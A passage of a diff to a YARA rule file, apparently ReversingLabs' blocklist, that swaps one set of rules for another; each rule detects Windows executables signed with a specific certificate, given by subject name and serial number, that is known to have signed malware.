"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12894-L12910" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b2261ed8001929be8f80f73cc0c5076138f4794c73cbffd63773da5fc44639a8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6920-L6936" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3b7b10afa5f0212bd494ba8fe32bef18f2bbd77c8ab2ad498b9557a0575cc177" score = 75 quality = 90 tags = "INFO, FILE" @@ -18037,22 +37828,22 @@ rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C4DL Media" and pe.signatures[i].serial=="68:89:aa:b6:20:2b:cc:5f:11:ca:ed:f4:d0:4f:43:5b" and 1231891200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DREAM SECURITY USA INC" and pe.signatures[i].serial=="4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" and 1592961292<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6839595d-b645-5963-bd96-a668bfdd667f" + id = "ce10840c-150d-5ecd-ab9a-7bc96092ebfd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12912-L12928" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f39f5a632544bc01c3b4c9e2f2dd33f7109c44375f54011a34181e10da79debc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6938-L6954" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5874860582ed5be6908dca38e6ecae831eeeb0c2b768e8065ada9fd5ac2bda89" score = 75 quality = 90 tags = "INFO, FILE" @@ -18062,22 +37853,22 @@ rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"SMART GREY\" LLC" and pe.signatures[i].serial=="3b:e6:30:83:fb:b1:78:7b:44:5d:a9:75:83:72:14:19" and 1493942400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LTD SERVICES LIMITED" and pe.signatures[i].serial=="7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" and 1616025600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6975acb9-3b37-51f5-8b4d-0d1a090a18e2" + id = "e42d2881-efda-5aa0-b455-dabbd3a77e97" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12930-L12946" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0155a8c71bf8426bbb980798772b04c145df5b8c4b60ff1a610a1236a47547ef" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6956-L6974" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "43f44cbedf37094416628c9df23767be3b036519f93222812597777a146ecb24" score = 75 quality = 90 tags = "INFO, FILE" @@ -18087,22 +37878,22 @@ rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RADIANT, OOO" and pe.signatures[i].serial=="6e:2d:34:49:27:2b:6b:96:b8:b9:f7:28:e8:75:80:d5" and 1421107200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Ornitek" and (pe.signatures[i].serial=="00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" or pe.signatures[i].serial=="ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29") and 1614643200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0e18d9ef-e861-5583-a2a3-5f54fae8d813" + id = "7151fd62-7f6c-59d7-800b-65e5b4db279b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12948-L12964" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8311b36f008e31b7ac27b439fa46da4c90ab4be6c7c89426f8e1939963bc3d7d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6976-L6992" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a5bb946c6199cd47a087ac26f0a996261318d1830191ea7c0e7797ff03984558" score = 75 quality = 90 tags = "INFO, FILE" @@ -18112,22 +37903,22 @@ rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="26:8c:0d:70:28:a1:54:ac:3b:63:49:c5" and 1474266712<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bisoyetutu Ltd Ltd" and pe.signatures[i].serial=="26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" and 1616025600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "71e627d9-0892-5501-8189-26eae36b7965" + id = "12c80895-57fd-5341-b3ef-d59c25d4c234" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12966-L12982" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cfb2631bc1832f65fb9d77c812bf2a1e05121e825254bd57ae8b21e7b10b2344" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6994-L7010" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6e77c7d0bd7e5e9bc8880cc6ffc3f5f4f738e3dde22c270ad7a6f6672a99de53" score = 75 quality = 90 tags = "INFO, FILE" @@ -18137,22 +37928,22 @@ rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DON'T MISS A WORD LIMITED" and pe.signatures[i].serial=="2d:aa:8d:62:9c:c0:41:0a:94:82:e6:2a:0f:8b:f8:fc" and 1543449600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Medium LLC" and pe.signatures[i].serial=="59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" and 1609113600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d133dac3-3959-50f0-913e-b279ca6a1c2c" + id = "ec525737-9770-585e-922a-43f14e0a4a37" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12984-L13002" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "337dc486f2bdca1f7682887d5e5c0f82961850a8fd9c9a20b9a43a75334070d8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7012-L7030" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e7fbc1f32adec39c94dc046933e152cd6d3946da4a168306484b7b6bc7f26fb6" score = 75 quality = 90 tags = "INFO, FILE" @@ -18162,22 +37953,22 @@ rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Alexsandro Da Rosa - ME" and (pe.signatures[i].serial=="00:9a:72:7e:20:0e:a7:65:70" or pe.signatures[i].serial=="9a:72:7e:20:0e:a7:65:70") and 1539056530<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NANAX d.o.o." and (pe.signatures[i].serial=="00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" or pe.signatures[i].serial=="ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d") and 1613520000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "89f3a334-cd2f-51b9-83b2-2baca3c59ba5" + id = "c09778b6-17c9-5b24-8977-1bd998083c23" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13004-L13020" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "164b064a9df31d4a122236dfee7b713417a44d47a7f304b2bf55686a7f038feb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7032-L7048" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7079d4f1973ad4de21e1f88282c94b11c4d63f8bad12b35ef76a481e154d9da3" score = 75 quality = 90 tags = "INFO, FILE" @@ -18187,22 +37978,22 @@ rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dialer Access" and pe.signatures[i].serial=="09:54:a3:c8:76:df:92:62:cd:e5:81:7f:98:70:f0:c6" and 1160438400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Toko Saya ApS" and pe.signatures[i].serial=="7d:cd:19:a9:45:35:f0:34:ee:36:af:46:76:74:06:33" and 1609200000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ad7d8be0-ecb1-508f-bfce-7a5cecfd4e2f" + id = "004454a0-20f9-58f5-8c24-8097f7586c5b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13022-L13038" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "260a58669043d21ee0ffccbdee95c9d04ef338497685d42f1951660f658a164d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7050-L7068" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9633f3494e9ece3a698d47c5ba2b7ee7f82cee4be36ac418c969c36285c4963c" score = 75 quality = 90 tags = "INFO, FILE" @@ -18212,22 +38003,22 @@ rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CPM Media, Ltd." and pe.signatures[i].serial=="3c:30:93:0e:53:bb:02:6f:9a:5d:74:40:15:5f:71:18" and 1064534400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ELISTREID, OOO" and (pe.signatures[i].serial=="00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" or pe.signatures[i].serial=="ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3") and 1614643200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_24C1Ef800F275Ab2780280C595De3464 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "eeccb477-0bf7-5b79-94df-710e6e0db78f" + id = "251212a5-95ce-5d9f-aec0-e6d3dd099349" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13040-L13056" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d5a0b7f19f66f18b5ef1c548276b675ead74fed6be94310c303bfad6c85f18be" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7070-L7086" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7536ec92f388234bea3b33bee4af52e0e0ce9cd86b1c8321a503f70bfe5faa76" score = 75 quality = 90 tags = "INFO, FILE" @@ -18237,22 +38028,22 @@ rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="43:2e:ef:c0:d4:dc:03:26:eb:27:7a:51:8c:c4:31:0a" and 1466121600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HOLGAN LIMITED" and pe.signatures[i].serial=="24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" and 1614729600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6401831B46588B9D872B02076C3A7B00 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "00b92b5d-59e3-5aae-954d-a90bd8cc1370" + id = "61b67e68-9e15-5848-b12a-437a0ad8399e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13058-L13074" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cae1d381bf2018a0ce56feb245d01f2bfea55b67894264d32d78dbb41873c792" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7088-L7104" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cb84b27391fa0260061bc5444039967e83f2134f7b56f9cccf6a421d4a65a577" score = 75 quality = 90 tags = "INFO, FILE" @@ -18262,22 +38053,22 @@ rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="47:0d:6c:e2:1a:69:40:32:02:61:f0:9e" and 1474523038<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ACTIV GROUP ApS" and pe.signatures[i].serial=="64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" and 1615507200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A01A91Cce63Ede5Eaa3Dac4883Aea05 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a7b815d9-e247-5de1-9bcb-96294b3b91c0" + id = "a1efbce8-3cca-5e07-a652-d67007c72a18" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13076-L13092" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f378c490ff4f32fc095c822f75abac44a8d94327404cd97546c63e7441e07632" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7106-L7122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58a26b44e485814fa645bfa490f3442745884026bb7a70327d4f51645ad3f69c" score = 75 quality = 90 tags = "INFO, FILE" @@ -18287,22 +38078,22 @@ rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shang Hai Jian Ji Wang Luo Ke Ji You Xian Gong Si" and pe.signatures[i].serial=="7e:6b:c7:e5:a4:9e:2c:28:e6:f5:d0:42" and 1560995284<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Seacloud Technologies Pte. Ltd." and pe.signatures[i].serial=="0a:01:a9:1c:ce:63:ed:e5:ea:a3:da:c4:88:3a:ea:05" and 1618876800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_54Cd7Ae1C27F1421136Ed25088F4979A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8ac60604-6548-5f11-bf89-ec7e927b20f7" + id = "76999ae0-966e-5c52-8e00-a3af8afd8fae" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13094-L13110" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "112e834a24c50d639f8607740faa609f1a36539058357544e5dbcddf841f3116" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7124-L7140" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c7cd84a225216ff1464a147c2572de2b0a2f69f7a315cdebef5ad2bab843b72a" score = 75 quality = 90 tags = "INFO, FILE" @@ -18312,22 +38103,22 @@ rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="4c:50:20:89:91:47:c8:50:19:6c:4e:bf" and 1476693792<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures[i].serial=="54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" and 1616371200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F2D693Aad63E6920782A0027Dfc97D91 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "df467418-9d57-5ad0-b396-2ef519a22989" + id = "c4876bdd-35bc-5a3f-9f55-9a730e7ff5c8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13112-L13128" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d60a5bbd50484d620ab60cfd40840abc541c2b7bc1005a9076b69ddd1b938652" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7142-L7160" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8f29e65b39608518d16f708faef68db37b6e179c567819dccb6681adcec262e3" score = 75 quality = 90 tags = "INFO, FILE" @@ -18337,22 +38128,22 @@ rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ding Ruan" and pe.signatures[i].serial=="4e:fc:f7:ad:c2:1f:07:0e:59:0d:49:dd:b8:08:13:97" and 1476921600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EKO-KHIM TOV" and (pe.signatures[i].serial=="00:f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91" or pe.signatures[i].serial=="f2:d6:93:aa:d6:3e:69:20:78:2a:00:27:df:c9:7d:91") and 1598989763<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F8E8F6C92Ba666B0688A8Cacce9Acccf : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e56205d6-9f02-5a8a-8dd3-b8c323fba4bf" + id = "909d0ce9-406c-539f-9d0e-d7ab1b277ee3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L13130-L13148" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "77cc439aea6eaa5a835b6b1aa50904c1df0d5379228e424ab2d68a3cb654834c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L7162-L7180" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "aa419bc044be55d4c94481998be4e9c0310416740084eb8376842cf5416d78bf" score = 75 quality = 90 tags = "INFO, FILE" @@ -18362,22 +38153,22 @@ rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Amma" and (pe.signatures[i].serial=="00:cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" or pe.signatures[i].serial=="cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2") and 1431734400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5 th Dimension LTD Oy" and (pe.signatures[i].serial=="00:f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf" or pe.signatures[i].serial=="f8:e8:f6:c9:2b:a6:66:b0:68:8a:8c:ac:ce:9a:cc:cf") and 1618531200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d1cf11fc-eb30-54fc-9e34-91ad0c67e694" + id = "25df791f-1128-51f9-90da-9977262d00c7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 